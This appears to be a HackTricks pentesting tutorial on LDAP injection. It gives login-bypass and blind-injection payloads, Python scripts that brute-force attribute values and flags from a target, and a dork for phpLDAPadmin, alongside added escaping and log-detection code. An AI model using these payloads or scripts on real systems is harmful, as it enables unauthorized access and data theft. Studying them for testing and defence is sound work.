LDAP Injection
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
If you are interested in a hacking career and in hacking the unhackable - we are hiring! (fluent written and spoken Polish is required).
{% embed url="https://www.stmcyber.com/careers" %}
LDAP Injection
LDAP
If you want to learn what LDAP is, visit the following page:
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}
LDAP Injection is an attack that targets web applications which build LDAP statements from user input. It occurs when the application fails to sanitize that input properly, allowing an attacker to manipulate the LDAP statements through a local proxy, which can lead to unauthorized access or data manipulation.
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
The LDAP search filter grammar (simplified from RFC 4515), which any injected value has to fit into:

```
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
```

For example:

```
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
```
You can access the database, and it may contain information of many different types.

- OpenLDAP: If 2 filters arrive, it executes only the first one.
- ADAM or Microsoft LDS: With 2 filters they throw an error.
- SunOne Directory Server 5.0: It executes both filters.

It is very important to send the filter with correct syntax, or an error will be thrown. It is better to send only 1 filter.

The filter must start with `&` or `|`. Example: `(&(directory=val1)(folder=public))`

```
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
```

Then `(&(objectClass=*)(ObjectClass=*))` will be the first filter (the one that gets executed).
Login Bypass
LDAP supports several formats for storing the password: clear, md5, smd5, sha1, sha, crypt. So it may be that, regardless of what you enter in the password field, it gets hashed.

```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can throw an error

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) --> As (|) is FALSE then the user is admin and the password check is True.

username=*
password=*)(&
--> (&(user=*)(password=*)(&))

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
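Every payload above works because the raw value is spliced into the filter unescaped. The following is an added example, not code from the original page: it escapes assertion values as RFC 4515 requires and adds a structural sanity check, then runs the page's own payloads through both the vulnerable and the hardened builder. The login form, its field names `user`/`password` and the attribute names are assumed.

```python
# Added example (not from the original page): RFC 4515 escaping that
# neutralises the payloads listed above, plus a structural sanity check.
# The login form, its field names and the attribute names are assumed.

def escape_filter_value(value: str) -> str:
    """Escape a user-supplied LDAP assertion value (RFC 4515 section 3).
    Each of backslash, *, (, ) and NUL becomes a backslash plus its two-digit
    hex code, so it can no longer change the structure of the filter."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def build_login_filter_unsafe(user: str, password: str) -> str:
    """Vulnerable pattern: raw concatenation, which is what the payloads exploit."""
    return f"(&(user={user})(password={password}))"


def build_login_filter_safe(user: str, password: str) -> str:
    """Hardened pattern: every user-controlled value is escaped first."""
    return (f"(&(user={escape_filter_value(user)})"
            f"(password={escape_filter_value(password)}))")


def is_single_balanced_filter(flt: str) -> bool:
    """Defence in depth: accept only one complete parenthesised filter with
    nothing after it and no NUL byte. Rejects the 'admin))(|(|' and '*))%00'
    shapes, but NOT '*)(&' (that one stays balanced), so escaping is still required."""
    if not flt.startswith("(") or "\x00" in flt:
        return False
    depth = 0
    for i, ch in enumerate(flt):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and i != len(flt) - 1:
                return False  # a second filter follows the first one
    return depth == 0


if __name__ == "__main__":
    # Constructed inputs taken from the payload list on this page.
    for user, password in [("*", "*"), ("*)(&", "*)(&"), ("admin))(|(|", "any")]:
        unsafe = build_login_filter_unsafe(user, password)
        safe = build_login_filter_safe(user, password)
        print(f"unsafe: {unsafe!r:45} single_filter={is_single_balanced_filter(unsafe)}")
        print(f"safe:   {safe!r:45} single_filter={is_single_balanced_filter(safe)}")
```

The structural check alone is not a fix: `(&(user=*)(&)(password=*)(&))` is a perfectly well-formed filter, which is exactly why value escaping has to happen first.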
Blind LDAP Injection
You can force False or True responses to check whether any data is returned and confirm a possible Blind LDAP Injection:

```bash
#This will result in True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))

#This will result in False, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
Dump data
You can iterate over the ASCII letters, digits and symbols:

```bash
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
```
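From the defender's side, both the True/False probes and the character-by-character dump above leave a distinctive trail: many requests from one source whose parameter values contain raw filter metacharacters. The following is an added example, not code from the original page, that flags such requests in web access logs. The log lines are constructed and the parameter names (`search`, `login`, `password`) are assumed.

```python
# Added example (not from the original page): flag the blind-injection
# probes described above in web access logs. The log lines are constructed
# and the parameter names (search, login, password) are assumed.
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Raw filter metacharacters in a decoded parameter value. A legitimate value
# would carry them escaped (\2a, \28, \29, \5c, \00 per RFC 4515), so their
# presence after URL-decoding is a strong signal.
META = re.compile(r"[()*\\\x00]")

SAMPLE_LOG = [  # constructed: one blind-extraction loop, one normal user, one lone probe
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?search=admin*)(password=A* HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?search=admin*)(password=B* HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?search=admin*)(password=M* HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?search=smith HTTP/1.1" 200 800',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "POST /login.php?login=*))%00&password=x HTTP/1.1" 302 0',
]


def suspicious_params(request_line: str) -> list:
    """Return (name, value) pairs whose URL-decoded value contains metacharacters."""
    path = request_line.split(" ")[1]           # "/search.php?search=..."
    query = urlsplit(path).query
    # parse_qsl percent-decodes values, so %2A / %29 / %00 are caught as well
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if META.search(v)]


def probe_sources(log_lines, threshold: int = 3) -> dict:
    """Source IPs with at least `threshold` metacharacter-bearing requests.
    The character-by-character loop above issues one such request per guess,
    so the count climbs quickly from a single source."""
    counts = Counter()
    for line in log_lines:
        ip = line.split(" ", 1)[0]
        request = line.split('"')[1]             # text between the first pair of quotes
        if suspicious_params(request):
            counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in probe_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} requests with raw LDAP filter metacharacters")
```

The threshold separates a single stray probe from the sustained loop a dump script produces; tune it to the normal request rate of the form being protected.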
Scripts
Discovering valid LDAP fields
LDAP objects contain several attributes by default that can be used to store information. You can try to brute-force all of them to extract that information. You can find a list of default LDAP attributes here.

```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet: #In each position test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login':query, 'password':'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break

            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
                finish = True
                print()
```
Special Blind LDAP Injection (without "*")

```python
#!/usr/bin/python3
import requests, string

alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""

for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
```
Google Dorks
intitle:"phpLDAPadmin" inurl:cmd.php
More Payloads
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}